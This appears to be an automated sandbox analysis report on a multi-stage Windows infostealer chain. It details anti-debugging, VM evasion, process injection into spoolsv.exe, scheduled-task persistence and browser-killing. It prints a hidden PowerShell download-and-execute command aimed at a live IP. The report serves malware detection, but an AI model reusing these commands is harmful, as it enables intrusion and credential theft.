                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: rapes.exe, rapes.exe, 0000001C.00000002.2112228521.0000000000625000.00000040.00000001.01000000.0000000D.sdmp, bb5ad48269.exe, bb5ad48269.exe, 00000021.00000002.1814569773.0000000001286000.00000040.00000001.01000000.00000013.sdmp, 19be97887a.exe, 00000023.00000002.2122777341.000000000100D000.00000040.00000001.01000000.00000012.sdmp, ab5415a7b5.exe, 00000035.00000002.2094934994.0000000000E9F000.00000040.00000001.01000000.00000017.sdmp, bb5ad48269.exe, 00000036.00000002.1990503385.0000000001286000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: bb5ad48269.exe, 00000021.00000002.1815098400.00000000016FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareJ?
                      Source: svchost.exe, 00000015.00000002.2121398677.000002CF0A42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@B
                      Source: powershell.exe, 0000000F.00000002.1057945331.0000024DF889A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                      Source: firefox.exe, 00000034.00000002.1983640551.000001F9149A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: mshta.exe, 0000000B.00000003.902320000.0000028CE511C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\O
                      Source: bb5ad48269.exe, 00000036.00000002.1992251677.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarey
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: powershell.exe, 0000000C.00000002.981367721.0000025659E39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\on
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: svchost.exe, 0000001A.00000002.2116237958.00000251C1C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: svchost.exe, 0000001A.00000002.2117239912.00000251C1C64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
                      Source: powershell.exe, 0000000C.00000002.981367721.0000025659DF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: svchost.exe, 0000001A.00000002.2117239912.00000251C1C7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-9
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                      Source: svchost.exe, 0000001A.00000002.2114846614.00000251C1C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: rapes.exe, 0000001C.00000002.2120033160.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1983640551.000001F9149A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000002.993690562.00000000004F5000.00000040.00000001.01000000.0000000A.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000002.1009569593.00000000004F5000.00000040.00000001.01000000.0000000A.sdmp, rapes.exe, 00000013.00000002.1011070809.0000000000625000.00000040.00000001.01000000.0000000D.sdmp, rapes.exe, 00000014.00000002.1028263597.0000000000625000.00000040.00000001.01000000.0000000D.sdmp, rapes.exe, 0000001C.00000002.2112228521.0000000000625000.00000040.00000001.01000000.0000000D.sdmp, bb5ad48269.exe, 00000021.00000002.1814569773.0000000001286000.00000040.00000001.01000000.00000013.sdmp, 19be97887a.exe, 00000023.00000002.2122777341.000000000100D000.00000040.00000001.01000000.00000012.sdmp, ab5415a7b5.exe, 00000035.00000002.2094934994.0000000000E9F000.00000040.00000001.01000000.00000017.sdmp, bb5ad48269.exe, 00000036.00000002.1990503385.0000000001286000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: 19be97887a.exe, 0000001E.00000003.1832789599.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861451133.0000000000D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Hides threads from debuggers
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeThread information set: HideFromDebugger
                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: SIWVID
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeCode function: 17_2_05090562 rdtsc 17_2_05090562
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637AB21D4 LdrLoadDll,29_2_0000017637AB21D4
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097EAA2 BlockInput,34_2_0097EAA2
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA22D0 GetTickCount64,SetLastError,DeviceIoControl,IsDebuggerPresent,29_2_00007FF7C9CA22D0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,34_2_009042DE
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_0045DB60 mov eax, dword ptr fs:[00000030h]28_2_0045DB60
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00465FF2 mov eax, dword ptr fs:[00000030h]28_2_00465FF2
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00924CE8 mov eax, dword ptr fs:[00000030h]34_2_00924CE8
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CAC564 GetProcessHeap,29_2_00007FF7C9CAC564
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\spoolsv.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\spoolsv.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA5F0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00007FF7C9CA5F0C
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA6570 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00007FF7C9CA6570
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA937C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00007FF7C9CA937C
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA6748 SetUnhandledExceptionFilter,29_2_00007FF7C9CA6748
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00932622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00932622
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_0092083F
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009209D5 SetUnhandledExceptionFilter,34_2_009209D5
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00920C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00920C21
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeMemory protected: page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: amsi64_4764.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi64_5884.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4764, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6660, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5884, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bb5ad48269.exe PID: 5724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bb5ad48269.exe PID: 6960, type: MEMORYSTR
                      Allocates memory in foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 15A0000 protect: page execute and read and write
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 15A2264
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeNtAllocateVirtualMemory: Indirect: 0x17637AB2C74
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeMemory written: C:\Windows\System32\spoolsv.exe base: 15A0000 value starts with: 4D5A
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\System32\spoolsv.exeThread register set: target process: 7536
                      Writes to foreign memory regions
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeMemory written: C:\Windows\System32\spoolsv.exe base: 15A0000
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00961201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,34_2_00961201
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_00438700 ShellExecuteA,Sleep,CreateThread,Sleep,28_2_00438700
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096B226 SendInput,keybd_event,34_2_0096B226
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,34_2_009822DA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\mtzRdqIHD.hta"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe "C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe "C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe "C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
